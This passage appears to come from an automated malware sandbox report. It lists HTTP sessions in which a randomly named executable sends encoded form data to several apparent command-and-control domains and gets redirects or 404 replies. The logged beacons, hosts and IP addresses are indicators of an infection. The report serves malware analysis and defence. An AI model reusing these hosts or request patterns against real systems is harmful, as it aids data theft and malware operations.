                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 62 65 4d 6e 38 6c 4b 71 4d 52 6f 78 31 57 44 67 48 4d 6c 68 6d 30 62 65 7a 34 68 70 48 66 50 32 78 70 72 32 57 4e 64 44 77 46 32 72 42 6e 44 43 50 75 70 41 31 59 52 52 6b 43 68 57 44 71 63 39 6a 34 6f 45 30 78 7a 4c 57 59 66 69 30 54 75 41 55 32 58 6a 2f 77 57 38 47 6a 4e 67 31 6a 42 41 6a 48 62 45 41 6c 35 33 64 4b 33 45 38 4f 70 6b 4e 33 6d 4c 34 45 76 48 59 6e 6e 55 38 79 63 34 4c 75 71 34 79 68 73 76 50 74 61 41 45 57 52 2f 33 71 74 48 6f 75 68 67 58 35 2b 75 4f 4d 45 6c 36 48 6a 33 4a 6e 54 73 63 46 73 4d 51 2b 4f 55 4b 38 63 47 42 56 4b 72 38 75 54 47 4d 6b 43 61 6b 34 76 37 39 39 4a 5a 69 70 4e 4d 43 72 65 43 48 41 73 77 59 6f 6f 49 56 37 2b 56 52 6a 4a 48 78 74 4f 37 66 77 66 45 78 49 2f 69 37 58 33 4f 54 32 62 32 68 33 70 61 64 57 34 4b 36 52 6f 66 62 6b 54 62 48 39 4a 48 65 42 4c 4d 48 4b 43 52 42 6e 74 70 57 39 32 72 62 56 79 6b 36 5a 4e 34 64 69 68 55 76 46 6d 49 55 56 4d 4a 42 4a 63 34 55 4f 37 79 45 71 41 69 6f 49 65 36 6c 4d 57 58 42 38 52 6a 33 39 6e 54 4c 4c 4a [TRUNCATED]
                                                                                  Data Ascii: v2x4if=beMn8lKqMRox1WDgHMlhm0bez4hpHfP2xpr2WNdDwF2rBnDCPupA1YRRkChWDqc9j4oE0xzLWYfi0TuAU2Xj/wW8GjNg1jBAjHbEAl53dK3E8OpkN3mL4EvHYnnU8yc4Luq4yhsvPtaAEWR/3qtHouhgX5+uOMEl6Hj3JnTscFsMQ+OUK8cGBVKr8uTGMkCak4v799JZipNMCreCHAswYooIV7+VRjJHxtO7fwfExI/i7X3OT2b2h3padW4K6RofbkTbH9JHeBLMHKCRBntpW92rbVyk6ZN4dihUvFmIUVMJBJc4UO7yEqAioIe6lMWXB8Rj39nTLLJTs8rq4AK7z3KqsAgGtCzqL+pn8r7WGk2/KagSzEMkZmNd033zbWf8CoHb+vDz8jogZulmmsA+QAiGl98HK7A439GRcnl9LDTzvTTF5+AIYQPHWoV/h1B8/HRmsBGSuUqkjzUgthci015W/L2ELvLmmfIDC3LBn0me15ca3UysEzBcxIxrr+U2uR8GWDz2+tGDuv17dPt1KloLGQIoUQ4AuLcZ42d0rLGCRD+1AYst34mfQJqDrlm/zP/q4GOJTYFslyG1dJjOPTZRVL/HPeBPWb6qD7yyMscB0fFiox1eud0pePx38CbwoIqwKZeBWwoQuvU7eB9oYy89pC3oqUvRVDyWKWuKoij1KlCnjhOJsx0/BjAcM/8rhZ2Sx2mBGLRLRVTdJx40EO+NPAN5P9mgdDnjTCQXYFC/mrDiYNpaaiEKxGy2O2GSfHiOXUj0eVXGT4/rJgKeH4+k0BEYy+YVGJnyDc+zxeqZm9AcsxYvo4C6llBbtTzKNqQGnnCTXa/3v/BLd1sIxZnjvLJwdPo0PwO2kHZrwwBNF+FXKMK9B3AlCyQl2I2kLHhBBxAGkyYC4P+P08C6ADDgqlBsdTRc3RqDMJC8N6NeCk5eZ8ytCoErIshBjJYEh9rC5tsO3K/ZUArSGbZGMvN2G13HvkoFXBzwXEh9QWgNu [TRUNCATED]
                                                                                  Oct 7, 2024 15:06:28.919851065 CEST325INHTTP/1.1 301 Moved Permanently
                                                                                  location: https://stratogent.info/1c49/
                                                                                  vary: Accept-Encoding
                                                                                  server: DPS/2.0.0+sha-227ca78
                                                                                  x-version: 227ca78
                                                                                  x-siteid: us-east-1
                                                                                  set-cookie: dps_site_id=us-east-1; path=/
                                                                                  date: Mon, 07 Oct 2024 13:06:28 GMT
                                                                                  keep-alive: timeout=5
                                                                                  transfer-encoding: chunked
                                                                                  connection: close
                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.2.54999876.223.105.230801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:06:30.986391068 CEST550OUTGET /1c49/?v2x4if=WckH/SqvT3kS7RHLNOlxiQ21wOxfNt38tZjSQddzpQSzD2qOP8gJzvFEgzI5dIMVlIsEuBKIXf3X3jGZEF/onz6UCD5x8CZk1xGCCmMlAa+hgJB6DGnTg2zkdlj6iSBSfg==&bTU8=BDEpwP48zFO0YTL HTTP/1.1
                                                                                  Host: www.stratogent.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Oct 7, 2024 15:06:31.420846939 CEST486INHTTP/1.1 301 Moved Permanently
                                                                                  location: https://stratogent.info/1c49/?v2x4if=WckH/SqvT3kS7RHLNOlxiQ21wOxfNt38tZjSQddzpQSzD2qOP8gJzvFEgzI5dIMVlIsEuBKIXf3X3jGZEF/onz6UCD5x8CZk1xGCCmMlAa+hgJB6DGnTg2zkdlj6iSBSfg==&bTU8=BDEpwP48zFO0YTL
                                                                                  vary: Accept-Encoding
                                                                                  server: DPS/2.0.0+sha-227ca78
                                                                                  x-version: 227ca78
                                                                                  x-siteid: us-east-1
                                                                                  set-cookie: dps_site_id=us-east-1; path=/
                                                                                  date: Mon, 07 Oct 2024 13:06:31 GMT
                                                                                  keep-alive: timeout=5
                                                                                  transfer-encoding: chunked
                                                                                  connection: close
                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.2.549999206.238.91.127801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:06:37.271420002 CEST804OUTPOST /ms92/ HTTP/1.1
                                                                                  Host: www.hpb5spjmad.buzz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.hpb5spjmad.buzz
                                                                                  Referer: http://www.hpb5spjmad.buzz/ms92/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 207
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 71 2b 31 6a 55 62 30 71 6a 51 67 37 34 37 65 43 6b 6a 6d 7a 44 74 6f 68 68 47 78 68 48 4b 50 64 4c 31 43 68 4e 73 6b 32 67 63 50 47 6d 76 52 71 57 78 2b 77 6c 6d 49 4d 6b 78 66 58 6b 34 51 4f 43 2b 62 52 38 63 75 55 75 30 4c 62 54 61 5a 45 67 73 33 58 61 2f 55 50 4d 46 38 44 6e 74 48 76 54 5a 7a 72 67 72 49 46 41 38 79 74 4b 77 34 6f 59 33 78 4c 6a 56 38 5a 31 55 49 41 42 65 30 37 6a 79 50 6e 75 59 73 50 73 31 37 54 4c 43 4d 6d 47 4f 43 70 44 31 7a 75 72 74 55 51 37 44 6f 38 70 5a 4c 79 38 44 55 61 56 4f 73 50 2f 31 2f 63 38 6f 37 78 78 36 64 2f 39 6c 47 67 35 76 6c 4b 49 42 73 48 31 2f 4d 3d
                                                                                  Data Ascii: v2x4if=q+1jUb0qjQg747eCkjmzDtohhGxhHKPdL1ChNsk2gcPGmvRqWx+wlmIMkxfXk4QOC+bR8cuUu0LbTaZEgs3Xa/UPMF8DntHvTZzrgrIFA8ytKw4oY3xLjV8Z1UIABe07jyPnuYsPs17TLCMmGOCpD1zurtUQ7Do8pZLy8DUaVOsP/1/c8o7xx6d/9lGg5vlKIBsH1/M=
                                                                                  Oct 7, 2024 15:06:38.116815090 CEST691INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 07 Oct 2024 13:06:37 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.2.550000206.238.91.127801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:06:39.815701962 CEST824OUTPOST /ms92/ HTTP/1.1
                                                                                  Host: www.hpb5spjmad.buzz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.hpb5spjmad.buzz
                                                                                  Referer: http://www.hpb5spjmad.buzz/ms92/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 227
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 71 2b 31 6a 55 62 30 71 6a 51 67 37 35 61 75 43 6a 41 4f 7a 42 4e 6f 69 76 6d 78 68 4e 71 50 5a 4c 31 4f 68 4e 6f 63 6d 68 76 72 47 68 4f 68 71 52 77 2b 77 6b 6d 49 4d 76 52 66 65 36 49 51 48 43 2b 65 73 38 65 36 55 75 30 66 62 54 62 70 45 67 37 62 55 49 66 55 4e 42 6c 38 4e 6a 74 48 76 54 5a 7a 72 67 76 6b 6a 41 38 71 74 4b 41 49 6f 4b 47 78 45 34 31 38 61 79 55 49 41 46 65 31 77 6a 79 50 46 75 5a 77 31 73 32 54 54 4c 44 38 6d 47 66 44 2f 4a 31 7a 73 30 64 56 35 7a 51 4a 32 6a 71 6e 51 38 77 68 79 42 65 38 58 2b 44 53 32 6d 4b 7a 5a 69 61 78 48 74 32 4f 58 6f 66 45 6a 53 69 38 33 72 6f 61 46 55 56 4c 33 6d 4b 58 37 6c 32 74 72 36 4c 4b 62 6b 33 74 4e
                                                                                  Data Ascii: v2x4if=q+1jUb0qjQg75auCjAOzBNoivmxhNqPZL1OhNocmhvrGhOhqRw+wkmIMvRfe6IQHC+es8e6Uu0fbTbpEg7bUIfUNBl8NjtHvTZzrgvkjA8qtKAIoKGxE418ayUIAFe1wjyPFuZw1s2TTLD8mGfD/J1zs0dV5zQJ2jqnQ8whyBe8X+DS2mKzZiaxHt2OXofEjSi83roaFUVL3mKX7l2tr6LKbk3tN
                                                                                  Oct 7, 2024 15:06:40.639985085 CEST691INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 07 Oct 2024 13:06:40 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.2.550001206.238.91.127801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:06:42.364573002 CEST1841OUTPOST /ms92/ HTTP/1.1
                                                                                  Host: www.hpb5spjmad.buzz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.hpb5spjmad.buzz
                                                                                  Referer: http://www.hpb5spjmad.buzz/ms92/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1243
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 71 2b 31 6a 55 62 30 71 6a 51 67 37 35 61 75 43 6a 41 4f 7a 42 4e 6f 69 76 6d 78 68 4e 71 50 5a 4c 31 4f 68 4e 6f 63 6d 68 76 6a 47 6d 38 46 71 58 54 57 77 2b 6d 49 4d 69 78 66 54 36 49 52 58 43 2b 6d 6f 38 65 47 75 75 33 6e 62 54 35 68 45 78 2b 76 55 52 76 55 4e 49 46 38 41 6e 74 48 2b 54 5a 6a 76 67 72 45 6a 41 38 71 74 4b 47 6b 6f 4a 58 78 45 2f 46 38 5a 31 55 49 4d 42 65 31 59 6a 7a 6d 34 75 5a 30 6c 76 47 7a 54 4c 6a 73 6d 44 70 33 2f 50 6c 7a 71 31 64 56 68 7a 51 46 31 6a 71 37 6d 38 78 55 5a 42 63 63 58 38 33 37 53 78 6f 7a 4f 68 35 64 6e 74 32 61 35 36 50 59 67 55 52 49 33 67 4b 75 7a 65 68 4c 30 70 4f 4b 36 78 47 34 62 6c 50 6d 75 67 67 52 63 2f 4b 44 56 78 68 5a 78 48 53 46 75 61 48 58 50 65 43 72 62 30 36 32 32 72 73 7a 6a 34 63 71 38 55 54 69 56 6d 68 34 48 79 63 57 75 4c 63 39 75 6a 48 43 31 6f 4c 4f 4d 2b 39 68 59 4b 32 41 59 39 57 50 4b 47 56 6e 55 39 55 54 58 45 6f 4c 44 71 37 31 43 43 6a 39 50 72 79 51 39 35 5a 32 49 44 53 68 41 4f 65 39 62 43 62 71 65 2b 70 77 [TRUNCATED]
                                                                                  Data Ascii: v2x4if=q+1jUb0qjQg75auCjAOzBNoivmxhNqPZL1OhNocmhvjGm8FqXTWw+mIMixfT6IRXC+mo8eGuu3nbT5hEx+vURvUNIF8AntH+TZjvgrEjA8qtKGkoJXxE/F8Z1UIMBe1Yjzm4uZ0lvGzTLjsmDp3/Plzq1dVhzQF1jq7m8xUZBccX837SxozOh5dnt2a56PYgURI3gKuzehL0pOK6xG4blPmuggRc/KDVxhZxHSFuaHXPeCrb0622rszj4cq8UTiVmh4HycWuLc9ujHC1oLOM+9hYK2AY9WPKGVnU9UTXEoLDq71CCj9PryQ95Z2IDShAOe9bCbqe+pwL2OhU7C/tSrtcAFkJSVSxNwfRQqoxjNCcjLXzJUlol5LJ8ME8+bKXrxCxldGGtZU08ylo73MeA+pqeei15ncgbdtOOgTHpw6x4hLWdMaBZuRjLMyIc1DtLnEzaqhBRBxUa/0tQIhGb1VDtQxgpit8Jdoj7wfrRRSCtLv6Gam4743AWqQp9Yy3DqP1d6lpLrWay6lK4Hsdij0mu7XGSbw4MGNdKNP7k93Z2Fz4N0sYZqRXLya13fdn9OZn7c4tD1XVpC88f9kAPs/TacQ5dTIR3ciMR2XFJercdfBmWARnptHeVNClb6EImtTyy868wHnbfp4vTncO0Xupti2QKJF0HDGzJ1vdXLh5c2U3UfFK0aVA8fNzvwarEBt7B+/kvi9GR6DRTDvG5jEOwN9bwCvv5mt7co1R/CXpE54b4T1mU5U62GYmakfajV1Fzz7izLJbR6YPG9bkR9I7GC75Yy765+033CYglzx43TTmhRUVkqfTXLjAMmQS8d1rvENkO5RLXh2dOjqv9GzDf6kAf7nkN3hTSbnna+206VZ8XBQX+QRGuv5OYtR1zfOYcJtfTzqns784mcar6aNhuDC67xUAPyDvlhHxU99AOfRGeOBeSPn1g7v3pQEw5PZBOd2oPEdiIbTHOU+lXHuG9r70BJh1y/w8FyEJBLc1W [TRUNCATED]
                                                                                  Oct 7, 2024 15:06:43.188961029 CEST691INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 07 Oct 2024 13:06:43 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  24192.168.2.550002206.238.91.127801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:06:44.908337116 CEST550OUTGET /ms92/?v2x4if=n8dDXvAJzlUA6O6FnjGVBJIJvgZrOKbtAkr4DdUmwdjfrfZifRy06AIZkxbgl7NZdYzWyf+P5ib5INIFgNORIa1dMQY3kp3ISeG94e9yVPy6MxUyIGQp/U8X9iEsYtM0zA==&bTU8=BDEpwP48zFO0YTL HTTP/1.1
                                                                                  Host: www.hpb5spjmad.buzz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Oct 7, 2024 15:06:45.748918056 CEST691INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 07 Oct 2024 13:06:45 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  25192.168.2.550003209.74.64.190801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:06:59.249718904 CEST786OUTPOST /akfs/ HTTP/1.1
                                                                                  Host: www.dbold.top
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.dbold.top
                                                                                  Referer: http://www.dbold.top/akfs/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 207
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 67 53 46 56 57 75 51 45 4e 6f 62 4c 69 34 6f 77 69 6c 51 73 6d 56 56 4f 47 4a 2b 52 70 30 66 47 4a 4e 57 34 2f 42 4a 57 53 62 6d 6e 31 35 69 56 36 41 6a 49 65 51 59 6e 64 4a 56 78 76 79 38 6a 44 79 58 6f 6a 47 46 65 4a 35 69 73 2b 4b 4e 38 70 68 51 6e 59 41 46 76 53 33 2b 4b 43 43 52 62 71 75 32 34 62 5a 37 66 31 43 49 54 34 4a 55 6e 66 48 38 69 52 67 64 64 64 76 33 69 6c 6d 2b 33 67 74 70 6c 4f 31 4b 46 30 71 52 2f 50 46 51 4a 31 4d 5a 77 51 38 5a 4a 41 72 68 56 4b 62 48 72 35 66 5a 69 32 66 6b 39 47 55 38 4c 71 76 45 7a 4d 70 68 4c 73 68 77 53 7a 72 64 63 6c 43 7a 46 2b 69 69 39 55 55 63 3d
                                                                                  Data Ascii: v2x4if=gSFVWuQENobLi4owilQsmVVOGJ+Rp0fGJNW4/BJWSbmn15iV6AjIeQYndJVxvy8jDyXojGFeJ5is+KN8phQnYAFvS3+KCCRbqu24bZ7f1CIT4JUnfH8iRgdddv3ilm+3gtplO1KF0qR/PFQJ1MZwQ8ZJArhVKbHr5fZi2fk9GU8LqvEzMphLshwSzrdclCzF+ii9UUc=
                                                                                  Oct 7, 2024 15:06:59.820636988 CEST533INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 07 Oct 2024 13:06:59 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
